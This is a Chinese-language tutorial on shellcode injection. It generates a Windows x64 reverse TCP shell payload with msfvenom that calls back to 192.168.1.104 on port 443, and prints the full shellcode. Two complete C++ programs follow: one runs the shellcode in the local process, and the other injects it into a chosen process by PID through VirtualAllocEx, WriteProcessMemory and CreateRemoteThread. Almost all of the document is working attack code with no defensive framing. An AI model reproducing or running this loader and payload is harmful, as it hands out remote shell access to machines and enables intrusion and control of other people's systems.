这次我们来学习一下将shellcode注入本地进程内存并切执行的经典方法
首先生成我们的shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d
root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload Found 3 compatible encoders Attempting to encode payload with 1 iterations of generic/none generic/none failed with Encoding failed due to a bad character (index=50, char=0x61) Attempting to encode payload with 1 iterations of x64/xor x64/xor succeeded with size 503 (iteration=0) x64/xor chosen with final size 503 Payload size: 503 bytes Final size of c file: 2138 bytes unsigned char buf[] = "\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff" "\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58" "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33" "\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0" "\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1" "\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07" "\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0" "\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec" "\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93" "\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99" "\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a" "\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0" "\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7" "\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e" "\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1" "\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13" "\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e" "\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13" "\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a" "\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5" "\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a" "\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7" "\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9" "\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4" "\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7" "\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b" "\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56" "\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85" "\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a" "\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac" "\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7" "\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90" "\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96" "\x65\x4b\x99\x46\xd5\xdb\x11\xd7";
这里我们用c++注入本地进程
// ConsoleApplication3.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "stdafx.h"
#include "Windows.h"
int main()
{
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";
void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, buf, sizeof buf);
((void(*)())exec)();
return 0;
}
我们来反汇编一下看看这个shellcode是如何在x64机器上面运行的
下面我们将shellcode注入到指定pid进程
我们构造注入进程c++代码
// ConsoleApplication4.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "Windows.h"
int main(int argc, char *argv[])
{
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
printf("Injecting to PID: %i", atoi(argv[1]));
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, buf, sizeof buf, NULL);
remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);
return 0;
}